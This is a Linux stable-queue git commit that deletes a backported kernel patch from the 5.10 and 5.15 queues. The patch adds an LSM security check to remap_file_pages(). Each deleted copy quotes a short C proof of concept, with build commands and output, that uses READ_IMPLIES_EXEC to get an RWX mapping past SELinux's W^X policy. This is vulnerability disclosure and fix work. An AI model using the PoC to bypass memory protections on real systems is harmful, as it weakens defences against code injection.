From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Date: Wed, 19 Feb 2025 08:12:25 +0000 (+0100)
Subject: drop mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
X-Git-Tag: v6.1.129~6
X-Git-Url: http://git.ipfire.org/?a=commitdiff_plain;h=d42ce448c7eb7ae883c50de44de02006ed24df78;p=thirdparty%2Fkernel%2Fstable-queue.git

drop mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
---

diff --git a/queue-5.10/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch b/queue-5.10/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
deleted file mode 100644
index f9e785baeb..0000000000
--- a/queue-5.10/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 Mon Sep 17 00:00:00 2001
-From: Shu Han <ebpqwerty472123@gmail.com>
-Date: Tue, 17 Sep 2024 17:41:04 +0800
-Subject: mm: call the security_mmap_file() LSM hook in remap_file_pages()
-
-From: Shu Han <ebpqwerty472123@gmail.com>
-
-commit ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 upstream.
-
-The remap_file_pages syscall handler calls do_mmap() directly, which
-doesn't contain the LSM security check. And if the process has called
-personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for
-RW pages, this will actually result in remapping the pages to RWX,
-bypassing a W^X policy enforced by SELinux.
-
-So we should check prot by security_mmap_file LSM hook in the
-remap_file_pages syscall handler before do_mmap() is called. Otherwise, it
-potentially permits an attacker to bypass a W^X policy enforced by
-SELinux.
-
-The bypass is similar to CVE-2016-10044, which bypass the same thing via
-AIO and can be found in [1].
-
-The PoC:
-
-$ cat > test.c
-
-int main(void) {
-	size_t pagesz = sysconf(_SC_PAGE_SIZE);
-	int mfd = syscall(SYS_memfd_create, "test", 0);
-	const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,
-		MAP_SHARED, mfd, 0);
-	unsigned int old = syscall(SYS_personality, 0xffffffff);
-	syscall(SYS_personality, READ_IMPLIES_EXEC | old);
-	syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);
-	syscall(SYS_personality, old);
-	// show the RWX page exists even if W^X policy is enforced
-	int fd = open("/proc/self/maps", O_RDONLY);
-	unsigned char buf2[1024];
-	while (1) {
-		int ret = read(fd, buf2, 1024);
-		if (ret <= 0) break;
-		write(1, buf2, ret);
-	}
-	close(fd);
-}
-
-$ gcc test.c -o test
-$ ./test | grep rwx
-7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)
-
-Link: https://project-zero.issues.chromium.org/issues/42452389 [1]
-Cc: stable@vger.kernel.org
-Signed-off-by: Shu Han <ebpqwerty472123@gmail.com>
-Acked-by: Stephen Smalley <stephen.smalley.work@gmail.com>
-[PM: subject line tweaks]
-Signed-off-by: Paul Moore <paul@paul-moore.com>
-Signed-off-by: Pratyush Yadav <ptyadav@amazon.de>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- mm/mmap.c |    4 ++++
- 1 file changed, 4 insertions(+)
-
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -3078,8 +3078,12 @@ SYSCALL_DEFINE5(remap_file_pages, unsign
- 	}
- 
- 	file = get_file(vma->vm_file);
-+	ret = security_mmap_file(vma->vm_file, prot, flags);
-+	if (ret)
-+		goto out_fput;
- 	ret = do_mmap(vma->vm_file, start, size,
- 			prot, flags, pgoff, &populate, NULL);
-+out_fput:
- 	fput(file);
- out:
- 	mmap_write_unlock(mm);
diff --git a/queue-5.10/series b/queue-5.10/series
index b6382c2bdd..39d1e3b59a 100644
--- a/queue-5.10/series
+++ b/queue-5.10/series
@@ -319,7 +319,6 @@ x86-i8253-disable-pit-timer-0-when-not-in-use.patch
 revert-btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 pps-fix-a-use-after-free.patch
-mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
 ima-fix-use-after-free-on-a-dentry-s-dname.name.patch
 vlan-introduce-vlan_dev_free_egress_priority.patch
 vlan-move-dev_put-into-vlan_dev_uninit.patch
diff --git a/queue-5.15/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch b/queue-5.15/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
deleted file mode 100644
index 6753f80821..0000000000
--- a/queue-5.15/mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch
+++ /dev/null
@@ -1,78 +0,0 @@
-From ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 Mon Sep 17 00:00:00 2001
-From: Shu Han <ebpqwerty472123@gmail.com>
-Date: Tue, 17 Sep 2024 17:41:04 +0800
-Subject: mm: call the security_mmap_file() LSM hook in remap_file_pages()
-
-From: Shu Han <ebpqwerty472123@gmail.com>
-
-commit ea7e2d5e49c05e5db1922387b09ca74aa40f46e2 upstream.
-
-The remap_file_pages syscall handler calls do_mmap() directly, which
-doesn't contain the LSM security check. And if the process has called
-personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for
-RW pages, this will actually result in remapping the pages to RWX,
-bypassing a W^X policy enforced by SELinux.
-
-So we should check prot by security_mmap_file LSM hook in the
-remap_file_pages syscall handler before do_mmap() is called. Otherwise, it
-potentially permits an attacker to bypass a W^X policy enforced by
-SELinux.
-
-The bypass is similar to CVE-2016-10044, which bypass the same thing via
-AIO and can be found in [1].
-
-The PoC:
-
-$ cat > test.c
-
-int main(void) {
-	size_t pagesz = sysconf(_SC_PAGE_SIZE);
-	int mfd = syscall(SYS_memfd_create, "test", 0);
-	const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,
-		MAP_SHARED, mfd, 0);
-	unsigned int old = syscall(SYS_personality, 0xffffffff);
-	syscall(SYS_personality, READ_IMPLIES_EXEC | old);
-	syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);
-	syscall(SYS_personality, old);
-	// show the RWX page exists even if W^X policy is enforced
-	int fd = open("/proc/self/maps", O_RDONLY);
-	unsigned char buf2[1024];
-	while (1) {
-		int ret = read(fd, buf2, 1024);
-		if (ret <= 0) break;
-		write(1, buf2, ret);
-	}
-	close(fd);
-}
-
-$ gcc test.c -o test
-$ ./test | grep rwx
-7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)
-
-Link: https://project-zero.issues.chromium.org/issues/42452389 [1]
-Cc: stable@vger.kernel.org
-Signed-off-by: Shu Han <ebpqwerty472123@gmail.com>
-Acked-by: Stephen Smalley <stephen.smalley.work@gmail.com>
-[PM: subject line tweaks]
-Signed-off-by: Paul Moore <paul@paul-moore.com>
-Signed-off-by: Pratyush Yadav <ptyadav@amazon.de>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- mm/mmap.c |    4 ++++
- 1 file changed, 4 insertions(+)
-
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -3035,8 +3035,12 @@ SYSCALL_DEFINE5(remap_file_pages, unsign
- 		flags |= MAP_LOCKED;
- 
- 	file = get_file(vma->vm_file);
-+	ret = security_mmap_file(vma->vm_file, prot, flags);
-+	if (ret)
-+		goto out_fput;
- 	ret = do_mmap(vma->vm_file, start, size,
- 			prot, flags, pgoff, &populate, NULL);
-+out_fput:
- 	fput(file);
- out:
- 	mmap_write_unlock(mm);
diff --git a/queue-5.15/series b/queue-5.15/series
index 892e7fe574..c2f169228d 100644
--- a/queue-5.15/series
+++ b/queue-5.15/series
@@ -431,4 +431,3 @@ x86-i8253-disable-pit-timer-0-when-not-in-use.patch
 revert-btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 btrfs-avoid-monopolizing-a-core-when-activating-a-swap-file.patch
 pps-fix-a-use-after-free.patch
-mm-call-the-security_mmap_file-lsm-hook-in-remap_file_pages.patch